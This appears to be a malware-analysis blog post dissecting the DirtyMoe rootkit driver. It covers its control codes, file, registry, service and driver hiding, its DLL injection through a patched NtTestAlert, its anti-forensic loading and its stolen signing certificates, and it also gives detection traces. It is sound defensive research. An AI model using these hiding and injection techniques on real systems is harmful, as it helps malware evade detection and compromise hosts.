As we mentioned in the first post, every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most used techniques for hiding malicious activity is using rootkits. In general, the main goal of the rootkits is to hide itself and other modules of the hosted malware on the kernel layer. The rootkits are potent tools but carry a high risk of being detected because the rootkits work in the kernel-mode, and each critical bug leads to BSoD.

The primary aim of this next article is to analyze rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of a DirtyMoe driver, aiming to provide complex information about the driver in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activities on kernel and user mode. Moreover, the driver can execute commands received from the user-mode under the kernel privileges. Another significant aspect of the driver is an injection of an arbitrary DLL file into targeted processes. Last but not least is the driver’s functionality that censors the file system content. In the same way, we describe the refined routine that deploys the driver into the kernel and which anti-forensic method the malware authors used.

Another essential point of this research is the investigation of the driver’s meta-data, which showed that the driver is code-signed with the certificates that have been stolen and revoked in the past. However, the certificates are widespread in the wild and are misused in other malicious software in the present.

Finally, the last part summarises the rootkit functionally and draws together the key findings of digital certificates, making a link between DirtyMoe and other malicious software. In addition, we discuss the implementation level and sources of the used rootkit techniques.

1. Sample

The subject of this research is a sample with SHA-256:
The sample is a windows driver that DirtyMoe drops on the system startup.

Note: VirusTotal keeps a record of 44 of 71 AV engines (62 %) which detect the samples as malicious. On the other hand, the DirtyMoe DLL file is detected by 86 % of registered AVs. Therefore, the detection coverage is sufficient since the driver is dumped from the DLL file.

Basic Information
  • File Type: Portable Executable 64
  • File Info: Microsoft Visual C++ 8.0 (Driver)
  • File Size: 116.04 KB (118824 bytes)
  • Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)

The driver imports two libraries FltMgr and ntosrnl. Table 1 summarizes the most suspicious methods from the driver’s point.

Routine Description
FltSetCallbackDataDirty A minifilter driver’s pre or post operation calls the routine to indicate that it has modified the contents of the callback data structure.
FltGetRequestorProcessId Routine returns the process ID for the process requested for a given I/O operation.
FltRegisterFilter FltRegisterFilter registers a minifilter driver.
Routines delete, set, query, and open registry entries in kernel-mode.
ZwTerminateProcess Routine terminates a process and all of its threads in kernel-mode.
ZwQueryInformationProcess Retrieves information about the specified process.
MmGetSystemRoutineAddress Returns a pointer to a function specified by a routine parameter.
ZwAllocateVirtualMemory Reserves a range of application-accessible virtual addresses in the specified process in kernel-mode.
Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routine via MmGetSystemRoutineAddress() as a form of obfuscation since the string table contains routine names operating with VirtualMemory; e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel-routine ZwQueryInformationProcess() and strings such as services.exe, winlogon.exe point out that the rootkit probably works with kernel structures of the critical windows processes.

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities. However, it provides a wide scale of rootkit and backdoor techniques. The driver has been designed as a service support system for the DirtyMoe service in the user-mode.

The driver can perform actions originally needed with high privileges, such as writing a file into the system folder, writing to the system registry, killing an arbitrary process, etc. The malware in the user-mode just sends a defined control code, and data to the driver and it provides higher privilege actions.

Further, the malware can use the driver to hide some records helping to mask malicious activities. The driver affects the system registry, and can conceal arbitrary keys. Moreover, the system process services.exe is patched in its memory, and the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which driver is visible or not. Therefore, the malware is active, but the system and user cannot list the malware records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system since the driver implements a mechanism of the minifilter. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed to the user.

The driver consists of 10 main functionalities as Table 2 illustrates.

Function Description
Driver Entry routine called by the kernel when the driver is loaded.
Start Routine is run as a kernel thread restoring the driver configuration from the system registry.
Device Control processes system-defined I/O control codes (IOCTLs) controlling the driver from the user-mode.
Minifilter Driver routine completes processing for one or more types of I/O operations; QueryDirectory in this case. In other words, the routine filters folder enumerations.
Thread Notification routine registers a driver-supplied callback that is notified when a new thread is created.
Callback of NTFS Driver wraps the original callback of the NTFS driver for IRP_MJ_CREATE major function.
Registry Hiding is hook method provides registry key hiding.
Service Hiding is a routine hiding a defined service.
Driver Hiding is a routine hiding a defined driver.
Driver Unload routine is called by kernel when the driver is unloaded.
Table 2. Main driver functionality

Most of the implemented functionalities are available as public samples on internet forums. The level of programming skills is different for each driver functionality. It seems that the driver author merged the public samples in most cases. Therefore, the driver contains a few bugs and unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine that is called by the kernel after driver loading. The driver initializes a large number of global variables for the proper operation of the driver. Firstly, the driver detects the OS version and setups required offsets for further malicious use. Secondly, the variable for pointing of the driver image is initialized. The driver image is used for hiding a driver. The driver also associates the following major functions:

  1. IRP_MJ_CREATE, IRP_MJ_CLOSE – no interest action,
  2. IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
  3. IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to associate it with other malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method registering the FltPostOperation(); it filters access to the system drives and allows it to hide files and directories.

Further, the initialization method swaps a major function IRP_MJ_CREATE for \FileSystem\Ntfs driver. So, each API call of CreateFile() or a kernel-mode function IoCreateFile() can be monitored and affected by the malicious MalNtfsCreatCallback() callback.

Another Driver Entry method sets a callback method using PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors a kernel process creation, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

  • Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
  • Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for the process injecting:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of Start Routine loads the rest of the necessary entries from the registry. The complete list of the system registry is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives the IRP_MJ_DEVICE_CONTROL I/O control code (IOCTL) if a user-mode thread calls Win32 API DeviceIoControl(); visit [1] for more information. The user-mode application sends IRP_MJ_DEVICE_CONTROL directly to a specific device driver. The driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.


There are 9 main control codes invoking driver functionality from the user-mode. The following Table 3 summarizes controlling IOCTL that can be sent by malware using the Win32 API.

IOCTL Description
0x222C80 The driver accepts other IOCTLs only if the driver is activated. Malware in the user-mode can activate the driver by sending this IOCTL and authorization code equal 0xB6C7C230.
0x2224C0  The malware sends data which the driver writes to the system registry. A key, value, and data type are set by Setting control codes.
used variable: regKey, regValue, regData, regType
0x222960 This IOCTL clears all data stored by the driver.
used variable: see Setting and Inserting variables
0x2227EC If the malware needs to hide a specific driver, the driver adds a specific driver name to the
listBaseDllName and hides it using Driver Hiding.
0x2227E8 The driver adds the name of the registry key to the WinDeviceAddress list and hides this key
using Registry Hiding.
used variable: WinDeviceAddress
0x2227F0 The driver hides a given service defined by the name of the DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC If the malware wants to deactivate the Registry Hiding, the driver restores the original kernel
0x222004 The malware sends a process ID that wants to terminate. The driver calls kernel function
ZwTerminateProcess() and terminates the process and all of its threads regardless of malware privileges.
0x2224C8 The malware sends data which driver writes to the file defined by filePath variable; see Setting control codes
used variable: filePath, fileData
Table 3. Controlling IOCTLs

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

White/Black list Variable Purpose
Registry HIVE WinDeviceAddress Defines a list of registry entries that the malware wants to hide in the system.
Process Image File Name WinDeviceMaker Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
WinDeviceMakerB Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems.
WinDeviceMakerOnly Specifies a blacklist of processes defined by the process image file name. It is used in Callback of NTFS Driver and refuses access to the NTFS file systems.
File names
(full path)
Determines a whitelist of files that should be granted access by Callback of NTFS Driver. It is used in combination with WinDeviceMaker and WinDeviceMakerB. So, if a file is on the whitelist and a requested process is also whitelisted, the driver grants access to the file.
WinDeviceNameOnly Defines a blacklist of files that should be denied access by Callback of NTFS Driver. It is used in combination with WinDeviceMakerOnly. So, if a file is on the blacklist and a requesting process is also blacklisted, the driver refuses access to the file.
File names
(containing number)
WinDeviceNumber Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a name convention as follows: [A-Z][a-z][0-9]+\.[a-z]{3}. So, a file name includes a number.
Process ID ListProcessId1 Defines a list of processes requiring access to NTFS file systems. The malware does not restrict the access for these processes; see Callback of NTFS Driver.
ListProcessId2 The same purpose as ListProcessId1. Additionally, it is used as the whitelist for the registry hiding, so the driver does not restrict access. The Minifilter Driver does not limit processes in this list.
Driver names listBaseDllName Defines a list of drivers that should be hidden in the system;
see Driver Hiding.
Service names listServices Specifies a list of services that should be hidden in the system;
see Service Hiding.
Table 4. White and Black lists

The setting control codes store scalar values as a global variable. The following Table 5 summarizes and groups these variables and their purpose.

Function Variable Description
File Writing
Defines a file name and data for the first file written during the driver shutdown.
Defines a file name and data for the second file written during the driver shutdown.
Registry Writing
Specifies the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
Specifies the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing filePath Determines filename which will be used to write data;
see Controlling IOCTL 0x2224C8.
Registry Writing regKey
Specifies registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.);
see Controlling IOCTL 0x2224C0.
Keeps a path and data for file A.
Keeps a path and data for file B.
Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Function Variable Description
Process to Inject dwWinDriverMaker2
Defines two command-line arguments. If a process with one of the arguments is created, the driver should inject the process.
Defines two process names that should be injected if the process is created.
DLL to Inject dwWinDriverPath1
Specifies a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
Defines a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Keeps a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
Specifies a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If the QueryDirectory system request is invoked, the malware driver catches this request and processes it by its FltPostOperation().

The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

The driver affects the QueryDirectory results only if a requested process is not present in whitelists. There are two whitelists. The first whitelists (Process ID and File names) cause that the QueryDirectory results are not modified if the process ID or process image file name, requesting the given I/O operation (QueryDirectory), is present in the whitelists. It represents malware processes that should have access to the file system without restriction. The further whitelist is called WinDeviceNumber, defining a set of suffixes. The FltPostOperation() iterates each item of the QueryDirectory. If the enumerated item name has a suffix defined in the whitelist, the driver removes the item from the QueryDirectory results. It ensures that the whitelisted files are not visible for non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file for the user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from malware file names, e.g, Ke145057.xsl, since the suffix is a number; see Appendix B.

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by a malicious callback MalNtfsCreatCallback() as Figure 1 illustrates. The malicious callback determines what should gain access and what should not.

Figure 1. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process ID, and allowed files. If the process requesting the disk access is whitelisted, then the requested file must also be on the white list. It is double protection. The blacklist is focused on processing image names. Therefore, the blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

Figure 2. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.

2.6 Registry Hiding

The driver can hide a given registry key. Each manipulation with a registry key is hooked by the kernel method GetCellRoutine(). The configuration manager assigns a control block for each open registry key. The control block (CM_KEY_CONTROL_BLOCK) structure keeps all control blocks in a hash table to quickly search for existing control blocks. The GetCellRoutine() hook method computes a memory address of a requested key. Therefore, if the malware driver takes control over the GetCellRoutine(), the driver can filter which registry keys will be visible; more precisely, which keys will be searched in the hash table.

The malware driver finds an address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses well-documented implementation [3, 4]. It just goes through kernel structures obtained via the ZwOpenKey() kernel call. Then, the driver looks for CM_KEY_CONTROL_BLOCK, and its associated HHIVE structured correspond with the requested key. The HHIVE structure contains a pointer to the GetCellRoutine() method, which the driver replaces; see Figure 3.

Figure 3. Overwriting GetCellRoutine

This method’s pitfall is that offsets of looked structure, variable, or method are specific for each windows version or build. So, the driver must determine on which Windows version the driver runs.

The MalGetCellRoutine() hook method performs 3 basic operations as follow:

  1. The driver calls the original kernel GetCellRoutine() method.
  2. Checks whitelists for a requested registry key.
  3. Catches or releases the requested registry key according to the whitelist check.
Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across a whole HIVE of a requested key. If the driver finds a registry key to hide, it returns the last registry key of the iterated HIVE. When the interaction is at the end of the HIVE, the driver does not return the last key since it was returned before, but it just returns NULL, which ends the HIVE searching.

The consequence of this principle is that if the driver wants to hide more than one key, the driver returns the last key of the searched HIVE more times. So, the final results of the registry query can contain duplicate keys.


The services.exe and System services are whitelisted by default, and there is no restriction. Whitelisted process image names are also without any registry access restriction.

A decision-making mechanism is more complicated for Windows 10. The driver hides the request key only for regedit.exe application if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Device Entry initialization. The routine registers a callback which is subsequently notified when a new thread is created or deleted. The suspicious callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and Create flag. The driver affects only threads in which Create flag is set to TRUE, so only newly created threads.

The whitelisting is focused on two aspects. The first one is an image name, and the second one is command-line arguments of a created thread. The image name is stored in WinDriverMaker1, and arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by a process name and two processes defined by command line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

The successful injection of the malicious code requires several kernel methods. The driver does not call these methods directly due to detection techniques, and it tries to obfuscate the required method. The driver requires the following kernel methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll

The kernel methods are needed for successful thread injection because the driver needs to read/write process data of an injected thread, including program instruction.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all lookup methods are consecutively located after ZwAllocateVirtualMemory() method in ntdll.dll.

Figure 4. Code segment of ntdll.dll with VirtualMemory methods

The driver starts to inspect the code segments from the address of the ZwAllocateVirtualMemory() and looks up for instructions representing the constant move to eax (e.g. mov eax, ??h). It identifies the VirtualMemory methods; see Table 7 for constants.

Constant Method
0x18 ZwAllocateVirtualMemory
0x23 ZwQueryVirtualMemory
0x3A NtWriteVirtualMemory
0x50 ZwProtectVirtualMemory
Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When an appropriate constants is found, the final address of a lookup method is calculated as follow:

method_address = constant_address - alignment_constant;
where alignment_constant helps to point to the start of the looked-up method.

The steps to find methods can be summarized as follow:

  1. Get the address of ZwAllocateVirtualMemory(), which is not suspected in terms of detection.
  2. Each sought method contains a specific constant on a specific address (constant_address).
  3. If the constant_address is found, another specific offset (alignment_constant) is subtracted;
    the alignment_constant is specific for each Windows version.

The exact implementation of the Virtual Memory Method Lookup method  is shown in Figure 5.

Figure 5. Implementation of the lookup routine searching for the kernel VirtualMemory methods

The success of this obfuscation depends on the Window version identification. We found one Windows 7 version which returns different methods than the malware wants; namely, ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used for getting NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets the pointer to the kernel structure PEB_LDR_DATA containing PE header and imports of all processes in the system. If the import table includes a required method, then the driver extracts the base address, which is the entry point to the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via kernel function LdrLoadDll(). The process injection is slightly different for x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread’s APC queue. The APC (Asynchronous Procedure Call) is a technique to queue a job to be done in the context of a specific thread. It is called periodically. The driver rewrites the instructions of the NtTestAlert() which jumps to the entry point of the malicious code.

Modification of NtTestAlert Code

The first step to the process injection is to find free memory for a code cave. The driver finds the free memory near the NtTestAlert() routine address. The code cave includes a shellcode as Figure 6. demonstrates.

Figure 6. Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (code_cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax because the malicious code ends by the return instruction, and therefore the original NtTestAlert() is invoked. Finally, rdx contains the jump address, where the driver injected the malicious code. The next item of the code cave is a path to the DLL file, which shall be loaded into the injected process. Other items of the code cave are the original address and original code instructions of the NtTestAlert().

The driver writes the malicious code into the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are rewritten with the instruction which just jumps to the shellcode. It causes that when the NtTestAlert() is called, the shellcode is activated and jumps into the malicious code.

Malicious Code x64

The malicious code for x64 is simple. Firstly, it recovers the original instruction of the rewritten NtTestAlert() code. Secondly, the code invokes the found LdrLoadDll() method and loads appropriate DLL into the address space of the injected process. Finally, the code executes the return instruction and jumps back to the original NtTestAlert() function.

The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is also identical to the x64 version. However, the x86 malicious code needs to find a 32bit variant of the  LdrLoadDll() method. It uses the similar technique described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

Windows uses the Services Control Manager (SCM) to manage the system services. The executable of SCM is services.exe. This program runs at the system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all run services in an undocumented service record (SERVICE_RECORD) structure.

The driver must patch the service record to hide a required service. Firstly, the driver must find the process services.exe and attach it to this one via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. The services.exe keeps all run services as a linked list of SERVICE_RECORD [5]. The malware driver iterates this list and unlinks required services defined by listServices whitelist; see Table 4.

The used byte sequence for Windows 2000, XP, Vista, and Windows 7 is as follows: {45 3B E5 74 40 48 8D 0D}. There is another byte sequence {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D} that is never used because it is bound to the Windows version that the malware driver has never identified; maybe in development.

The hidden services cannot be detected using PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via Windows Event Log. Therefore, we can enumerate all regular services and all logged services. Then, we can create differences to find hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver based on the IOCTL from the user-mode. The Driver Entry is initiated by a parameter representing a driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called a driver section. The LDR_DATA_TABLE_ENTRY kernel structure stores information about the loaded driver, such as base/entry point address, image name, image size, etc. The driver section points to LDR_DATA_TABLE_ENTRY as a double-linked list representing all loaded drivers in the system.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of the LDR_DATA_TABLE_ENTRY structure. The malware driver iterates the whole list and unlinks items (drivers) that should be hidden. Therefore, the kernel loses pointers to the hidden drivers and cannot enumerate all loaded drivers [6].

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it seems to be never used in this version. The rest of the unload functionality executes standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. A driver image is not permanently stored on a disk since the service always extracts, loads, and deletes the driver images on the service startup. The secondary service aim is to eliminate evidence about driver loading and eventually complicate a forensic analysis. The service aspires to camouflage registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328App
Registry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name>
ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs
ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain

3.1 Registry Operation

On startup, the service creates a registry record, describing the malicious driver to load; see following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328
ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys
DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, which is the Windows common naming convention. Moreover, ImagePath prefixed with dump_ string is used for virtual drivers (loaded only in memory) managing the memory dump during the Windows crash. The malware tries to use the virtual driver name convention not to be so conspicuous. The principle of the Dump Memory using the virtual drivers is described in [7, 8].

ImagePath values are different from each windows reboot, but it always abuses the name of the system native driver; see a few instances collected during windows boot: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().

3.3 Evidence Cleanup

When the driver is loaded either successfully or unsuccessfully, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. Registry entries related to the driver are removed via the API call. Therefore, a forensics track can be found in the SYSTEM registry HIVE, located in %SystemRoot%\system32\config\SYSTEM. The API call just removes a relevant HIVE pointer, but unreferenced data is still present in the HIVE stored on the disk. Hence, we can read removed registry entries via RegistryExplorer.

The loaded driver also removes the dumped (dump_ prefix) driver file. We were not able to restore this file via tools enabling recovery of deleted files, but it was extracted directly from the service DLL file.

Capturing driver image and register keys

The malware service is responsible for the driver loading and cleans up of loading evidence. We put a breakpoint into the nt!IopLoadDriver() kernel method, which is reached if a process wants to load a driver into the system. We waited for the wanted driver, and then we listed all the system processes. The corresponding service (svchost.exe) has a call stack that contains the kernel call for driver loading, but the corresponding service has been killed by EIP registry modifying. The process (service) was killed, and the whole Windows ended in BSoD. Windows made a crash dump, so the file system caches have been flushed, and the malicious service did not finish the cleanup in time. Therefore, we were able to mount a volume and read all wanted data.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

The DirtyMoe service and loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can get additional information such as ProcessID and ThreadID of all services, including the hidden services.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with prefix dump_ and identify the malicious drivers.

Offline connected volume can provide the DLL library of the services and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require that loaded drivers must be code-signed. The digital code-signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates signing a Windows driver. So, if one of the certificates in the path is expired or revoked, the driver is still loaded into the system. We will not discuss why Windows loads drivers with invalid certificates since this topic is really wide. The backward compatibility but also a potential impact on the kernel implementation play a role.

DirtyMoe drivers are signed with three certificates as follow:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-‎2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-‎2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-‎2011 (10:42:04)

The certificates have been revoked by their certification authorities, and they are registered as stolen, leaked, misuse, etc. [10]. Although all certificates have been revoked in the past, Windows loads these drivers successfully because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

We summarize the main functionality of the DirtyMoe driver. We discuss the quality of the driver implementation, anti-forensic mechanisms, and stolen certificates for successful driver loading.

5.1 Main Functionality


The driver is controlled via IOCTL codes which are sent by malware processes in the user-mode. However, the driver implements the authorization instrument, which verifies that the IOCTLs are sent by authenticated processes. Therefore, not all processes can communicate with the driver.

Affecting the Filesystem

If a rootkit is in the kernel, it can do “anything”. The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in fact, it begins to filter the content of the filesystem. Furthermore, the driver replaces the NtfsCreatCallback() callback function of the NTFS driver, so the driver can determine who should gain access and what should not get to the filesystem.

Thread Monitoring and Code injection

The DirtyMoe driver enrolls a malicious routine which is invoked if the system creates a new thread. The malicious routine abuses the APC kernel mechanism to execute the malicious code. It loads arbitrary DLL into the new thread. 

Registry Hiding

This technique abuses the kernel hook method that indexes registry keys in HIVE. The code execution of the hook method is redirected to the malicious routine so that the driver can control the indexing of registry keys. Actually, the driver can select which keys will be indexed or not.

Service and Driver Hiding

Patching of specific kernel structures causes that certain API functions do not enumerate all system services or loaded drivers. Windows services and drivers are stored as a double-linked list in the kernel. The driver corrupts the kernel structures so that malicious services and drivers are unlinked from these structures. Consequently, if the kernel iterates these structures for the purpose of enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before driver loading, the DirtyMoe service must register the driver in the registry and dump the driver into the file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading. The driver deletes its own file from the file system through the kernel-mode. Therefore, the driver is loaded in the memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from the physical storage since the API calls only remove the pointer from HIVE. The dumped driver file is never physically stored on the disk drive because its size is too small and is present only in cache memory. Accordingly, the file is removed from the cache before cache flushing to the disk, so we cannot restore the file from the physical disk.

5.3 Discussion

The whole driver serves as an all-in-one super rootkit package. Any malware can register itself in the driver if knowing the authorization code. After successful registration, the malware can use a wide range of driver functionality. Hypothetically, the authorization code is hardcoded, and the driver’s name can be derived so we can communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never present in the file system physically, only in the cache. The driver is loaded via the API call, and the DirtyMoe service keeps a handler of the driver file, so the file manipulation with the driver file is limited. However, the driver removes its own file using kernel-call. Therefore, the driver file is removed from the file system cache, and the driver handler is still relevant, with the difference that the driver file does not exist, including its forensic traces.

The DirtyMoe malware is written using Delphi in most cases. Naturally, the driver is coded in native C. The code style of the driver and the rest of the malware is very different. We analyzed that most of the driver functionalities are downloaded from internet forums as public samples. Each implementation part of the driver is also written in a different style. The malware authors have merged individual rootkit functionality into one kit. They also merged known bugs, so the driver shows a few significant symptoms of driver presence in the system. The authors needed to adapt the functionality of the public samples to their purpose, but that has been done in a very dilettante way. It seems that the malware authors are familiar only with Delphi.

Finally, the code-signature certificates that are used have been revoked in the middle of their validity period. However, the certificates are still widely used for code signing, so the private keys of the certificates have probably been stolen or leaked. In addition, the stolen certificates have been signed by the certification authority which Microsoft trusts, so the certificates signed in this way can be successfully loaded into the system despite their revocation. Moreover, the trend in the use of certificates is growing, and predictions show that it will continue to grow in the future. We will analyze the problems of the code-signature certificates in the future post.

6. Conclusion

DirtyMoe driver is an advanced piece of rootkit that DirtyMoe uses to effectively hide malicious activity on host systems. This research was undertaken to inspect the rootkit functionally of the DirtyMoe driver and evaluate the impact on infected systems. This study set out to investigate and present the analysis of the DirtyMoe driver, namely its functionality, the ability to conceal, deployment, and code-signature.

The research has shown that the driver provides key functionalities to hide malicious processes, services, and registry keys. Another dangerous action of the driver is the injection of malicious code into newly created processes. Moreover, the driver also implements the minifilter, which monitors and affects I/O operations on the file system. Therefore, the content of the file system is filtered, and appropriate files/directories can be hidden for users. An implication of this finding is that malware itself and its artifacts are hidden even for AVs. More importantly, the driver implements another anti-forensic technique which removes the driver’s evidence from disk and registry immediately after driver loading. However, a few traces can be found on the victim’s machines.

This study has provided the first comprehensive review of the driver that protects and serves each malware service and process of the DirtyMoe malware. The scope of this study was limited in terms of driver functionality. However, further experimental investigations are needed to hunt out and investigate other samples that have been signed by the revoked certificates. Because of this, the malware author can be traced and identified using thus abused certificates.


Samples (SHA-256)


